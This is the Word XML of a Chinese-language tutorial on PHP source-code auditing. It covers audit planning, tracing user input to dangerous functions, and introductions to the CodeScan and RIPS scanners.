        <w:spacing w:before="162" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="501" w:firstLine="420"/>
        <w:jc w:val="both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w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>有计划地做事，这是一个很好的习惯。计划可以帮助我们明确我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>们取得了什么样的成果就可以称之为成功，面临什么样的问题才可以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>称之为失败。这样可以避免我们可能因为某天的情绪不佳而“果断”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>的放弃，也可以避免我们将时间不断地投向一个不可能完成的任务。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我在代码审计学习过程中，总结有两点是在前期计划必须明确的。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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>要找什么样的漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343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2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>要花多长时间完成这次审计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before="1" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>明确找</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>什么样的漏洞，能够方便我们在收集相关资料（如：引发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问题的函数字典）时的目标更精准，收集资料更全面。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确定整个审计的时间范围，一时间作为审计的量化标准，可以准确的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定位审计是否成功，当然，在不同的情况或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>者过程中，计划时间是可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以调整的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto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9"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="98"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="如何进行漏洞挖掘"/>
      <w:bookmarkStart w:id="10" w:name="_bookmark4"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如何进行漏洞挖掘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="98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程序的本质是变量与函数，漏洞所依赖的也无法脱离这两个元素。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让我们先来看下漏洞形成的条件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:ind w:left="837" w:right="98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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以控制的变量【一切输入都是有害的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】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="98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2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变量到达有利用价值的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>危险函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>【一切进入函数的变量是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有害的】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98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漏洞的利用效果最终也取决与函数的功能。所以我们在下面讲述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漏洞挖掘的过程中，也将围绕着这两个元素来展开。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="98" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="2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268065527" behindDoc="1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473329</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4392168" cy="212902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68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w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们提到漏洞形成的两大元素是可控变量，和可控变量能够进入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的函数。那么在漏洞挖掘中，我们也不外乎从这两个方向来开始。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2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="14"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="98" w:firstLine="420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w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从变量开始跟踪，我们就好像处在下图中圆形的位置，我们要处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理的“路”很多，但不是每条“路”都能到达三角形（函数）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="116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1"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="7"/>
          <w:lang w:eastAsia="zh-CN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  <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2687027" cy="21945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27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spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/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所以在一般的人工代码审计过程中，大都会选择查找危险函数，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然后根据危险函数中的变量回溯到传入变量的方式。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before="1" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="439" w:firstLine="420"/>
        <w:jc w:val="both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我们的审计方法也是偏向于通过函数查找变量，虽然这种方式效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果很好，但是我们也不应放过变量跟踪。如果你拥有一款不错的变量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跟踪自动化工具，那么你很幸运，不用花费很大的精力便可以完成这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个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任务。如果你是手工审计的话，我建议，你在跟踪函数之前，收集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所有可控变量（参数）的“最终形态”（所谓最终形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态，就是用户通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过各种方式传入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进程序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经过各种处理后，等待调用时的形态）。这样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可以帮助我们能够在跟踪危险函数时，更快的确定，函数是否能被利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用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="145"/>
        <w:ind w:left="837" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如何跳出传统的思维</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="190"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很多应用程序的官方都成立了安全部门，或者雇佣安全人员进行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代码审计，因此出现了很多自动化商业化的代码审计工具。也就是这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样的形势导致了一个局面：大公司的产品安全系数大大的提高，那些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很明显的漏洞基本灭绝了，那些大家都知道的审计技术都无用武之地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了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="both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76" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="501" w:firstLine="420"/>
        <w:jc w:val="both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w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>没有绝对安全的代码，我们需要跳出传统的思维，来获得新的漏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>洞。这也就是所谓的“跳出画来看画”，但是如何跳出来，这是我们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当前所要思考的地方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="837" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变量跟踪自动化的可行性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="193"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在学习和练习代码审计的过程中，我们几乎没有发现一款能够进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行变量跟踪的自动工具，大多数都是搜索危险函数的工具。传统的代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码审计都是基于静态的，而变量跟踪需要动态的实现，这也是导致跟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踪</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变量，工作量大的主要原因。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing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基于这个问题，目前有个想法，可以在一款代码调试工具中添加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特定变量发生改变或进入某些函数之前运行暂停的功能。这样，我们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="2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在代码审计的过程中便可以设定我们需要跟踪的可控变量，当</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其值发</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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生变化时，能够马上了解它的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing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也可以制作一个脚本，能够罗列出特定变量所必须或者有可能经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历的函数。这样我们可以结合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>危险函数跟踪的结果进行交集的查找，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大大的提高了效率和效果。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317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暂停一下，全部是文字的话不是很无聊？就算我不是原创我也应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该整理的很好玩有规律的让大家愉快的阅读。那么。开启新世界大门：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360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9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b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="一些代码审计工具介绍"/>
      <w:bookmarkStart w:id="12" w:name="_bookmark5"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一些代码审计工具介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="50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古语有云：工欲善其事，必先利其器。所以我们接下来要介绍几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款代码审计辅助工具给大家，可以让大家适当的减少工作量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.CodeScan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="18"/>
        <w:ind w:left="837" w:right="239" w:hanging="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>官方网站：</w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>www.codescan.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个比较老牌了。市面上流出的版本好像就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">1.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">1.9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>crack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>商业软件，比较蛋疼。不过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> GUI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>界面操作起来很方便。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</w:rPr>
        <w:t>这里也不多说什么，主要是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的提示设置，装过软件自己看看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就知道了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2.RIPS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:b/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="1" w:line="361" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:t>官方网站：</w:t>
      </w:r>
      <w:r>
        <w:t>rips-scanner.sourceforge.net</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="415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</w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>写的，需要环境，直接解压到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> wwwroot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>就好了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不适合扫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描整个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件夹项目，或者要修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-49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配置，把代码执行超时的时间设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置大一点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343" w:lineRule="exact"/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RIPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对代码进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>静态漏洞扫描的基本思想有两条：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对容易产生漏洞的函数进行跟踪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:mysql_query())</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="417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RIPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-23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认为，所有的注入漏洞最终都要经过一些特定的数据库操作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1"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mysql_query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或程序自定义的类函数，这些函数是产生漏洞的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="both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76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lastRenderedPageBreak/>
        <w:t>导火索，只要对这些函数的控制流和参数流进行回溯扫描，就可以发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现大部分的代码漏洞。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317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w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对产生注入漏洞的源头即用户传输过来的数据流进行跟踪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($_GET,$_POST,$_COOKIE)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w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
